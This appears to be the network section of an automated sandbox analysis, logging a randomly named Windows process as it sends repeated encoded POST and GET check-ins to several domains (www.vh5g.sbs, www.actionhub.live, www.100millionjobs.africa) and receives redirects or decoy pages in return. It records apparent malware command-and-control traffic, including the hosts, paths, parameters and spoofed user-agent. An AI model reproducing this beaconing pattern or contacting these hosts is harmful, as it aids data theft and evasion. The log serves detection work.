                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.vh5g.sbs
                                                                              Origin: http://www.vh5g.sbs
                                                                              Referer: http://www.vh5g.sbs/54nj/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=uS1c8tUP40fu6zNyGZBBmLBnjEyYBQ2YKgOin4VzZ6hz7BV4GBv7Iv4t9ttjF9JEsAy1iZtlDurhnL5VKbBj+sIrIXZBXfmEAmWl/g2AlrFmdM06KTQAiW81QGroG0omCec9tGPNs2Ew4UgqBrtYLlR0QWDS2DJKVd5hzSlHDBvkg2/URwrXoLQEAVR2sknzMFEjlHBI+fw2Jbx30zt9kpkchoyU
                                                                              Jan 14, 2025 12:02:00.506424904 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 14 Jan 2025 11:02:00 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.vh5g.sbs/
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                              Permissions-Policy: interest-cohort=()
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PeZBUJspwZlGAHAI7nwl8hsOyr%2BJh%2FFeVsPYMrLR5X5I92f064zi514Ojza1DdF0yVd60EZRUl0XhVwQXujgmhU3DeM%2Fp3nf6X2vqHi1KqZb33hFy0ioCYPynNcB1H4%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901d219bfe794259-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></ht
                                                                              Jan 14, 2025 12:02:00.506460905 CET | 12 | IN | Data Raw: 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: ml>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.2.5 | 49473 | 188.114.97.3 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:02.903641939 CET | 1681 | OUT | POST /54nj/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.vh5g.sbs
                                                                              Origin: http://www.vh5g.sbs
                                                                              Referer: http://www.vh5g.sbs/54nj/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A= [TRUNCATED]
                                                                              Jan 14, 2025 12:02:03.728939056 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 14 Jan 2025 11:02:03 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.vh5g.sbs/
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                              Permissions-Policy: interest-cohort=()
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1B9PDEit9yHpOpqE0JOS8Qo6DOYZsLrl64cX60D7KZW7PQTKNgL2NzagnOG8fHUMaJFkJRiJk2KmImCfnXK1bKHCIm1ddEjJp3RQQmyBXo4JZkEhQOgYOqg6Nf5n%2BI%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901d21afda7f7d00-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=1010&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1681&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html
                                                                              Jan 14, 2025 12:02:03.728956938 CET | 10 | IN | Data Raw: 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: >0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.2.5 | 49474 | 188.114.97.3 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:05.439086914 CET | 390 | OUT | GET /54nj/?t0A=jQd8/d8A1xfb/FB7GpkT6bk0jTG6GinOCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JjsIyEnVbQOGzSnW49Az79/F0I7s7DjUUiEBnQG3SAllRdw==&Gxq=1VbhX6 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.vh5g.sbs
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:06.068598986 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 14 Jan 2025 11:02:06 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Location: http://www.vh5g.sbs/
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                              Permissions-Policy: interest-cohort=()
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMH8Da8hw5aDyVTqs4UZEfCl2QDNEZZxa3rLiFEIgj4A5dTldHfprynAJczqzKBZm0GVOXFyeus%2BUq2kts0chJMWpRDP2gcV04NGooDiHD6gj9dLVKOSXKW2XKW%2Faik%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901d21be7d40c47c-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1540&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=390&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html
                                                                              Jan 14, 2025 12:02:06.068629026 CET | 10 | IN | Data Raw: 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: >0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.2.5 | 49475 | 67.223.117.189 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:19.462048054 CET | 662 | OUT | POST /gq43/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.actionhub.live
                                                                              Origin: http://www.actionhub.live
                                                                              Referer: http://www.actionhub.live/gq43/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=s91Hn1DiB/xFd0TNFRvGLIqEImCSeYmD8kvCoUQ/4/KdMRko4nM/HoSnsMGm3hgFlL5wwUimPFG8vfIuXNJ+CelOhjMMokzXNBv4fDj1v16A5NsnZw6RLKgp+17pf1DgmkB0X9+1kj1jh1VMc472fcHX6EEcVBjfy8ZE68had/GDUBzXM2ZUudtmZvIpUdxO9Q7+Q5Y=
                                                                              Jan 14, 2025 12:02:20.035646915 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 11:02:19 GMT
                                                                              Server: Apache
                                                                              Content-Length: 32106
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                              Jan 14, 2025 12:02:20.035665035 CET | 224 | IN
                                                                              Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/o
                                                                              Jan 14, 2025 12:02:20.035684109 CET | 1236 | IN
                                                                              Data Ascii: wl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css"> ... FABLES CUSTOM C
                                                                              Jan 14, 2025 12:02:20.035696983 CET1236INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62
                                                                              Data Ascii: div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <div class="container">
                                                                              Jan 14, 2025 12:02:20.035707951 CET1236INData Raw: 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                              Data Ascii: > </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconphone"></sp
                                                                              Jan 14, 2025 12:02:20.035721064 CET672INData Raw: 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67
                                                                              Data Ascii: vDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span> </button>
                                                                              Jan 14, 2025 12:02:20.035768986 CET1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                                              Jan 14, 2025 12:02:20.035780907 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
                                                                              Jan 14, 2025 12:02:20.035790920 CET448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68
                                                                              Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
                                                                              Jan 14, 2025 12:02:20.036072969 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                                              Jan 14, 2025 12:02:20.040666103 CET1236INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                                              Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49476 | 67.223.117.189 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 12:02:22.169286013 CET | 682 | OUT | POST /gq43/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
Connection: close
Cache-Control: max-age=0
Host: www.actionhub.live
Origin: http://www.actionhub.live
Referer: http://www.actionhub.live/gq43/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Jan 14, 2025 12:02:22.746599913 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 14 Jan 2025 11:02:22 GMT
Server: Apache
Content-Length: 32106
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49477 | 67.223.117.189 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 12:02:24.708631039 CET | 1699 | OUT | POST /gq43/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1240
Connection: close
Cache-Control: max-age=0
Host: www.actionhub.live
Origin: http://www.actionhub.live
Referer: http://www.actionhub.live/gq43/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Jan 14, 2025 12:02:25.282552004 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 14 Jan 2025 11:02:25 GMT
Server: Apache
Content-Length: 32106
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49478 | 67.223.117.189 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 12:02:27.254400969 CET | 396 | OUT | GET /gq43/?t0A=h/dnkFjaM/BlMTbeYCbPPPvCOUuyeqTz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOG85h61EUnTrHdBHCQyPsxSiY4d4RTFSWTaZW3nKuaFCelg==&Gxq=1VbhX6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Connection: close
Host: www.actionhub.live
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Jan 14, 2025 12:02:27.851429939 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 14 Jan 2025 11:02:27 GMT
Server: Apache
Content-Length: 32106
Connection: close
Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              9 | 192.168.2.5 | 49479 | 136.243.64.147 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:33.226027966 CET | 683 | OUT | POST /ktot/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 204
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.100millionjobs.africa
                                                                              Origin: http://www.100millionjobs.africa
                                                                              Referer: http://www.100millionjobs.africa/ktot/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=dv481RjyXXG1dXGi6mlUC0hsbP4EwsT6ixaLtmvZOVass0s18A71BicQ3Qbz93LqnYc30yO73G90y4Op+T4VuL6O6JJljdXMiP9lzQaxZXLrWySo5LCUuIw6EwSh7AmIpe8MnfPR/BhXSVUElFE7CNmL0SZqHIwftiOTnJjy83QQEq8kUe+q1aB0eowB0Ax5I/nxeBI=
                                                                              Jan 14, 2025 12:02:33.863503933 CET | 493 | IN | HTTP/1.1 302 Found
                                                                              Date: Tue, 14 Jan 2025 11:02:33 GMT
                                                                              Server: Apache
                                                                              Location: http://maximumgroup.co.za/ktot/
                                                                              Content-Length: 290
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              10 | 192.168.2.5 | 49480 | 136.243.64.147 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:35.774318933 CET | 703 | OUT | POST /ktot/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 224
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.100millionjobs.africa
                                                                              Origin: http://www.100millionjobs.africa
                                                                              Referer: http://www.100millionjobs.africa/ktot/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Data Ascii: t0A=dv481RjyXXG1f2Wi5FdUAUhtC/4E6MSzixeLtkCCOHussW019B71GicQ4wb2wXLjnYQF03u73HZ0y4+p5gASvb6A3pJnndXMiP9lzQ+bZXzrWiCo/e+LtIw5MQShpwmUpe8LneTr/CZXSVEEkUE4bdnA5yYjIKlr1hKloamHlhBtBcNOO82Cm6tMO742lwQQSc3BAWchiyf4pljgfmuqJiAxGUuK
                                                                              Jan 14, 2025 12:02:36.394908905 CET | 493 | IN | HTTP/1.1 302 Found
                                                                              Date: Tue, 14 Jan 2025 11:02:36 GMT
                                                                              Server: Apache
                                                                              Location: http://maximumgroup.co.za/ktot/
                                                                              Content-Length: 290
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              11 | 192.168.2.5 | 49481 | 136.243.64.147 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:38.321916103 CET | 1720 | OUT | POST /ktot/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 1240
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Host: www.100millionjobs.africa
                                                                              Origin: http://www.100millionjobs.africa
                                                                              Referer: http://www.100millionjobs.africa/ktot/
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:38.957910061 CET | 493 | IN | HTTP/1.1 302 Found
                                                                              Date: Tue, 14 Jan 2025 11:02:38 GMT
                                                                              Server: Apache
                                                                              Location: http://maximumgroup.co.za/ktot/
                                                                              Content-Length: 290
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/ktot/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              12 | 192.168.2.5 | 49482 | 136.243.64.147 | 80 | 2520 | C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Jan 14, 2025 12:02:40.859766006 CET | 403 | OUT | GET /ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.100millionjobs.africa
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:02:41.509357929 CET | 793 | IN | HTTP/1.1 302 Found
                                                                              Date: Tue, 14 Jan 2025 11:02:41 GMT
                                                                              Server: Apache
